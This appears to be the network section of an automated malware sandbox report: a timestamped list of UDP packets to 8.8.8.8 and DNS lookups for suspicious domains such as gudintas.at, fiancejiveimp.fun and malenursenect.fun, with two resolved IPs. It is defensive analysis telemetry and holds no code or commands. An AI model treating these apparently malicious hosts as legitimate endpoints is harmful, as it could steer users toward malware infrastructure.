                                                                    Oct 3, 2023 09:54:21.231211901 CEST6308853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:21.617263079 CEST53630888.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:22.587459087 CEST5272653192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:22.693098068 CEST53527268.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:23.667918921 CEST6527953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:23.906943083 CEST53652798.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:25.400300980 CEST5264353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:25.506962061 CEST53526438.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:26.528430939 CEST5471153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:26.634489059 CEST53547118.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:28.586168051 CEST5853853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:28.977442980 CEST53585388.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:29.721860886 CEST5472353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:30.047101974 CEST53547238.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:54:31.276496887 CEST5866353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:31.730473995 CEST53586638.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:04.060362101 CEST5447753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:04.166026115 CEST53544778.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:05.121788025 CEST5828353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:05.228233099 CEST53582838.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:06.696429014 CEST6552053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:07.038897991 CEST53655208.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:10.839030027 CEST5813153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:10.944413900 CEST53581318.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:11.601315022 CEST6003853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:11.847640038 CEST53600388.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:11.915206909 CEST5657053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:12.028397083 CEST53565708.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:12.172215939 CEST4920453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:12.277978897 CEST53492048.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:12.494259119 CEST5131353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:12.599880934 CEST53513138.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:13.173104048 CEST5893553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:13.282676935 CEST53589358.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:13.716542006 CEST5830053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:13.821806908 CEST53583008.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:14.398099899 CEST5731553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:14.510869026 CEST53573158.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:15.299715996 CEST4965053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:15.412400007 CEST53496508.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:15.842964888 CEST5927453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:15.948472023 CEST53592748.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:16.801752090 CEST5515453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:16.907373905 CEST53551548.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:17.665730000 CEST5598553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:17.778377056 CEST53559858.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:18.070851088 CEST5446153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:18.179146051 CEST53544618.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:18.244374037 CEST5730953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:18.363257885 CEST53573098.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:18.805826902 CEST6070553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:18.911356926 CEST53607058.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:19.445000887 CEST5158253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:19.558413029 CEST53515828.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:19.567414045 CEST5526053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:19.675420046 CEST53552608.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:19.992815018 CEST5882553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:20.113327980 CEST53588258.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:20.239548922 CEST5908453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:20.347726107 CEST53590848.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:20.746543884 CEST6201153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:20.859746933 CEST53620118.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:21.289602995 CEST6287753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:21.354202986 CEST6166253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:21.402916908 CEST53628778.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:21.462615013 CEST53616628.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:21.939672947 CEST5641053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:22.045336008 CEST53564108.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:22.364249945 CEST5423853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:22.469707966 CEST53542388.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:22.529767990 CEST5437753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:22.635590076 CEST53543778.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:22.903172970 CEST5622253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:23.014930010 CEST53562228.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:23.072477102 CEST5070953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:23.181235075 CEST53507098.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:23.584959984 CEST4972753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:23.678723097 CEST5414453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:23.690687895 CEST53497278.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:23.784531116 CEST53541448.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:24.112777948 CEST6067553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:24.222821951 CEST53606758.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:24.237315893 CEST6389053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:24.349270105 CEST53638908.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:24.566416025 CEST6254953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:24.674904108 CEST53625498.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:24.777072906 CEST5645453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:24.887358904 CEST53564548.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:25.113428116 CEST6044853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:25.219521046 CEST53604488.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:25.595415115 CEST5321953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:25.696755886 CEST53532198.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:25.703486919 CEST5285953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:25.813055038 CEST53528598.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:26.308640003 CEST5816953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:26.420981884 CEST53581698.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:26.610908031 CEST5609353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:26.716892958 CEST53560938.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:26.957942963 CEST6171453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:27.064409971 CEST53617148.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:27.155711889 CEST6169353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:27.261826992 CEST53616938.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:27.498208046 CEST5544853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:27.604238987 CEST53554488.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:27.890290022 CEST4960853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:27.996993065 CEST53496088.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:28.092936993 CEST6338453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:28.198657990 CEST53633848.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:28.364608049 CEST5748353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:28.470315933 CEST53574838.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:28.684962988 CEST5322153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:28.791251898 CEST53532218.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:28.903490067 CEST6335153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:29.009104013 CEST53633518.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:29.286057949 CEST5735153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:29.359997988 CEST5278953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:29.399643898 CEST53573518.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:29.465882063 CEST53527898.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:29.873977900 CEST5840153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:29.980228901 CEST53584018.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:30.468385935 CEST4931153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:30.577316999 CEST53493118.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:30.943604946 CEST6040853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:30.963993073 CEST6190053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:31.049436092 CEST53604088.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:31.070185900 CEST53619008.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:31.585679054 CEST5549953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:31.691574097 CEST53554998.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:32.255759001 CEST6524853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:32.364126921 CEST53652488.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:32.848978996 CEST5233153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:32.954849005 CEST53523318.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:33.324165106 CEST5302753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:33.427095890 CEST53530278.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:33.686187029 CEST6551253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:33.792503119 CEST53655128.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:33.890501022 CEST5726053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:33.998126984 CEST53572608.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:34.441478968 CEST6329153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:34.550575972 CEST53632918.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:34.982037067 CEST5337553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:35.041070938 CEST6404053192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:35.090553045 CEST53533758.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:35.152399063 CEST53640408.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:35.527823925 CEST5334853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:35.641345978 CEST53533488.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:36.003757000 CEST5462753192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:36.110250950 CEST53546278.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:37.483746052 CEST6034653192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:37.591631889 CEST53603468.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:38.912095070 CEST5351653192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:39.019612074 CEST53535168.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:41.133053064 CEST6195453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:41.233681917 CEST53619548.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:41.333543062 CEST6531653192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:41.442833900 CEST53653168.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:44.423726082 CEST5263853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:44.529648066 CEST53526388.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:45.015055895 CEST5141253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:45.129997969 CEST53514128.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:48.309801102 CEST5443453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:48.415349960 CEST53544348.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:48.901541948 CEST5864953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:49.004322052 CEST53586498.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:49.583966017 CEST5537553192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:49.692514896 CEST53553758.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:50.046008110 CEST5104453192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:50.152053118 CEST53510448.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:50.600830078 CEST6476153192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:50.707289934 CEST53647618.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:51.168009996 CEST4987953192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:51.274168968 CEST53498798.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:51.749145985 CEST6199253192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:51.856251955 CEST53619928.8.8.8192.168.2.3
                                                                    Oct 3, 2023 09:55:52.654536963 CEST5944353192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:55:52.761389017 CEST53594438.8.8.8192.168.2.3

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 3, 2023 09:54:19.376132011 CEST192.168.2.38.8.8.80x5c53Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.231211901 CEST192.168.2.38.8.8.80x6788Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.587459087 CEST192.168.2.38.8.8.80x8f91Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.667918921 CEST192.168.2.38.8.8.80x954eStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.400300980 CEST192.168.2.38.8.8.80xcf32Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.528430939 CEST192.168.2.38.8.8.80x4caaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.586168051 CEST192.168.2.38.8.8.80x4fdaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:29.721860886 CEST192.168.2.38.8.8.80xef90Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.276496887 CEST192.168.2.38.8.8.80x47f4Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.060362101 CEST192.168.2.38.8.8.80x1ab0Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.121788025 CEST192.168.2.38.8.8.80xdc05Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:06.696429014 CEST192.168.2.38.8.8.80xc73aStandard query (0)h170811.srv22.test-hf.suA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.839030027 CEST192.168.2.38.8.8.80x86eaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:11.601315022 CEST192.168.2.38.8.8.80x5411Standard query (0)fullppc.xyzA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:11.915206909 CEST192.168.2.38.8.8.80x2437Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.172215939 CEST192.168.2.38.8.8.80x48b1Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.494259119 CEST192.168.2.38.8.8.80xc7b0Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.173104048 CEST192.168.2.38.8.8.80xb72cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.716542006 CEST192.168.2.38.8.8.80xc99Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:14.398099899 CEST192.168.2.38.8.8.80x90eStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.299715996 CEST192.168.2.38.8.8.80xa73dStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.842964888 CEST192.168.2.38.8.8.80xb6eeStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.801752090 CEST192.168.2.38.8.8.80xad7cStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:17.665730000 CEST192.168.2.38.8.8.80x3754Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.070851088 CEST192.168.2.38.8.8.80xeabbStandard query (0)farformafor.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.244374037 CEST192.168.2.38.8.8.80xc1acStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.805826902 CEST192.168.2.38.8.8.80xe311Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.445000887 CEST192.168.2.38.8.8.80x6f8bStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.567414045 CEST192.168.2.38.8.8.80x3f9Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.992815018 CEST192.168.2.38.8.8.80xd36eStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.239548922 CEST192.168.2.38.8.8.80x1285Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.746543884 CEST192.168.2.38.8.8.80x107cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.289602995 CEST192.168.2.38.8.8.80x4eb7Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.354202986 CEST192.168.2.38.8.8.80xa47bStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.939672947 CEST192.168.2.38.8.8.80x3d97Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.364249945 CEST192.168.2.38.8.8.80x7f47Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.529767990 CEST192.168.2.38.8.8.80x7a6dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.903172970 CEST192.168.2.38.8.8.80xf1cdStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.072477102 CEST192.168.2.38.8.8.80xd23eStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.584959984 CEST192.168.2.38.8.8.80x54c7Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.678723097 CEST192.168.2.38.8.8.80xe13cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.112777948 CEST192.168.2.38.8.8.80xd596Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.237315893 CEST192.168.2.38.8.8.80x3d5fStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.566416025 CEST192.168.2.38.8.8.80x350Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.777072906 CEST192.168.2.38.8.8.80xd66cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.113428116 CEST192.168.2.38.8.8.80xe1a4Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.595415115 CEST192.168.2.38.8.8.80xd6fdStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.703486919 CEST192.168.2.38.8.8.80xefdfStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.308640003 CEST192.168.2.38.8.8.80x9f5cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.610908031 CEST192.168.2.38.8.8.80xb258Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.957942963 CEST192.168.2.38.8.8.80x5389Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.155711889 CEST192.168.2.38.8.8.80x89baStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.498208046 CEST192.168.2.38.8.8.80xf3f0Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.890290022 CEST192.168.2.38.8.8.80x6204Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.092936993 CEST192.168.2.38.8.8.80xc8c5Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.364608049 CEST192.168.2.38.8.8.80x28c4Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.684962988 CEST192.168.2.38.8.8.80xd304Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.903490067 CEST192.168.2.38.8.8.80xecebStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.286057949 CEST192.168.2.38.8.8.80x2145Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.359997988 CEST192.168.2.38.8.8.80x3aa6Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.873977900 CEST192.168.2.38.8.8.80xa97cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:30.468385935 CEST192.168.2.38.8.8.80x803aStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:30.943604946 CEST192.168.2.38.8.8.80xbef3Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:30.963993073 CEST192.168.2.38.8.8.80xefd2Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.585679054 CEST192.168.2.38.8.8.80x7e86Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.255759001 CEST192.168.2.38.8.8.80xd0bdStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.848978996 CEST192.168.2.38.8.8.80xf22fStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.324165106 CEST192.168.2.38.8.8.80x33d2Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.686187029 CEST192.168.2.38.8.8.80x2a6aStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.890501022 CEST192.168.2.38.8.8.80xc479Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:34.441478968 CEST192.168.2.38.8.8.80x77f9Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:34.982037067 CEST192.168.2.38.8.8.80x81aeStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.041070938 CEST192.168.2.38.8.8.80x29c9Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.527823925 CEST192.168.2.38.8.8.80xc84eStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:36.003757000 CEST192.168.2.38.8.8.80xc103Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:37.483746052 CEST192.168.2.38.8.8.80xb02Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:38.912095070 CEST192.168.2.38.8.8.80x87c3Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.133053064 CEST192.168.2.38.8.8.80xc3Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.333543062 CEST192.168.2.38.8.8.80x63faStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:44.423726082 CEST192.168.2.38.8.8.80x4b90Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:45.015055895 CEST192.168.2.38.8.8.80x4a1bStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:48.309801102 CEST192.168.2.38.8.8.80xba7dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:48.901541948 CEST192.168.2.38.8.8.80xdb7dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:49.583966017 CEST192.168.2.38.8.8.80xfadbStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.046008110 CEST192.168.2.38.8.8.80x3910Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.600830078 CEST192.168.2.38.8.8.80x636aStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.168009996 CEST192.168.2.38.8.8.80x94c9Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.749145985 CEST192.168.2.38.8.8.80x80ebStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:52.654536963 CEST192.168.2.38.8.8.80x9435Standard query (0)malenursenect.funA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
